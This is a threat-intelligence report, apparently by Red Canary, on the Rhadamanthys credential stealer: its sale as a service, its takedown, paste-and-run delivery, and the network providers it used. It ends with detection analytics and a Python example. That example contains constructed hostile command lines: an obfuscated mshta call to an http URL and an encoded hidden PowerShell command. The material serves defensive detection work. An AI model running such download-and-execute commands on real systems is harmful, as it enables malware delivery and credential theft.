
While Rhadamanthys stealer grew popular after the LummaC2 takedown, it soon fell victim to Operation Endgame.
Rhadamanthys is a commercially distributed stealer family that first appeared in underground markets around late 2022 and has since evolved through multiple versions. Sold as a MaaS offering, it gives even novice adversaries easy access to credential theft at scale. Like LummaC2, Rhadamanthys offers multiple price points for adversaries seeking to buy licensing and support for the stealer and related infrastructure.
Rhadamanthys is a modular platform, which allows its developers to actively maintain and extend its capabilities to evade detection. During 2025, the popularity of Rhadamanthys boomed shortly after international law enforcement actions against LummaC2 infrastructure as adversaries sought other stealer malware for operations. This popularity continued until November 2025, when international law enforcement agencies took action to take down Rhadamanthys’s infrastructure and seize systems as part of Operation Endgame.
Since Rhadamanthys is a MaaS offering, many different adversaries may buy the malware and use it against a plethora of targets. Rhadamanthys itself may be found across systems in many different countries and industries. Red Canary observed this opportunistic distribution in 2025 as adversaries adapted to deploying Rhadamanthys as payloads for paste-and-run activity after the LummaC2 takedown.
This lack of targeting has even proven troublesome for the Rhadamanthys developer, as they were banned from hacking forums for not restricting the stealer from executing in Commonwealth of Independent States (CIS) countries. This restriction is common among malware developers to avoid law enforcement attention in Russia.
For capabilities, Rhadamanthys has a comprehensive list of applications from which it can take passwords and other credentials. In an article where Check Point Research referred to Rhadamanthys as the “everything bagel,” researchers reported the stealer supports not only all major browser families but even some with very few users. In addition, the developers extended support for stealing credentials from browser extensions with as few as one registered user at the time.
Because it steals credentials from many different products, Rhadamanthys can facilitate breaches at organizations of all sizes and industries.
August through October 2025 showed the most Rhadamanthys activity in our data, replacing LummaC2 during that time. During the year, one third of our Rhadamanthys threats were distributed via paste and run.
For co-occurrences, Rhadamanthys was sometimes combined with CypherIT, HijackLoader, or LummaC2. HijackLoader and CypherIT were presumably used to help deliver Rhadamanthys while evading defenses, whereas its combination with LummaC2 in one case could indicate that the adversary who gained access either ran multiple stealers or allowed the access to be reused by another adversary with the second stealer.
In terms of network infrastructure, Red Canary processed 283 IP address indicators for Rhadamanthys in 2025. Taking a look at the autonomous system numbers (ASNs) for those IP addresses, Rhadamanthys used at least 97 different network providers during the year, stretching from legitimate providers to less savory ones. In fact, 34 of those 97 ASNs, or 35 percent, spent at least some time on the Spamhaus Do Not Route or Peer (DROP) list, indicating that the traffic from those sections of the internet was more likely to be fraudulent than not.
To see which network providers were the most popular, refer to the list of the ASN names and numbers below.
In cases where Rhadamanthys used SSL/TLS for command and control, the infrastructure nearly exclusively used self-signed certificates.
For endpoint process behaviors, Rhadamanthys is similar to other stealers in the sense that it emits precious little telemetry on its own. But when combined with crypters, loaders, and paste-and-run techniques, it can produce a variety of behaviors that are detectable.
Since Rhadamanthys has been distributed in so many different ways, preventative measures can take many approaches. We’ve observed Rhadamanthys distributed in fake software installations, paste-and-run campaigns, and more.
General preventative measures that apply to multiple malware families also help fight against Rhadamanthys:
For response, an excellent playbook would look something like this:
Finally, if financial details such as payment cards or cryptocurrency wallets are stored on the affected system, users may need to monitor the relevant accounts for unauthorized transactions.
Of the paste-and-run instances deploying Rhadamanthys, several used a combination of Mshta and PowerShell commands in subsequent stages. These pseudo-detection analytics identify multiple threats that may be distributed in this manner.
Note: * is a placeholder for strings associated with legitimate use of this function in your environment.
process == (mshta)
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)

parent_process == (mshta)
&&
process == (powershell)
&&
command_line_does_not_include == (*)
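As an added example (not from the Red Canary report), the two analytics above expressed as Python and run over constructed process events. The caret-stripping and -EncodedCommand decoding stand in for `deobfuscated_command_line`, and `LEGIT_STRINGS` is a hypothetical value for the `*` placeholder.

```python
import base64
import re

# Constructed sample process events (not telemetry from the report):
# (parent_process, process, command_line).
ENC = base64.b64encode(
    "Write-Output 'stage2 http://198.51.100.7/'".encode("utf-16-le")).decode()
EVENTS = [
    ("explorer.exe", "mshta.exe", "mshta h^t^t^p://198.51.100.7/x.hta"),
    ("mshta.exe", "powershell.exe", f"powershell -nop -w hidden -enc {ENC}"),
    ("svchost.exe", "mshta.exe", "mshta http://intranet.example/helper.hta"),
    ("cmd.exe", "powershell.exe", "powershell Get-Process"),
]
# Stands in for the "*" placeholder in the analytics: strings tied to
# legitimate use in your environment (hypothetical value; tune locally).
LEGIT_STRINGS = ("http://intranet.example/",)

def deobfuscate(cmd):
    """Approximate deobfuscated_command_line: drop cmd.exe caret escapes and
    append the decoded text of a PowerShell -enc/-EncodedCommand argument."""
    cmd = cmd.replace("^", "")
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if m:
        try:
            cmd += " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
        except ValueError:
            pass  # not valid base64; keep the raw command line
    return cmd

def is_legit(cmd):
    return any(s.lower() in cmd.lower() for s in LEGIT_STRINGS)

def detect(event):
    """Return the names of the analytics the event matches."""
    parent, proc, cmd = event
    parent, proc = parent.lower(), proc.lower()
    hits = []
    # Analytic 1: mshta whose deobfuscated command line contains "http".
    if proc == "mshta.exe" and "http" in deobfuscate(cmd).lower() and not is_legit(cmd):
        hits.append("mshta_http")
    # Analytic 2: PowerShell spawned by mshta, outside the allowlisted strings.
    if parent == "mshta.exe" and proc == "powershell.exe" and not is_legit(cmd):
        hits.append("mshta_spawns_powershell")
    return hits

def run(events=EVENTS):
    """Map event index -> matched analytics, for the events that matched."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}
```

The third event shows why the `*` allowlist matters: it carries an http URL in an mshta command line but matches a known legitimate string, so neither analytic fires.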
Start testing your defenses against Rhadamanthys using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
The following atomic test uses Mshta to execute PowerShell and should serve as a good starting point for validating the efficacy of the detection opportunities listed above:
T1218.005, Atomic Test #10: Mshta used to Execute PowerShell
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.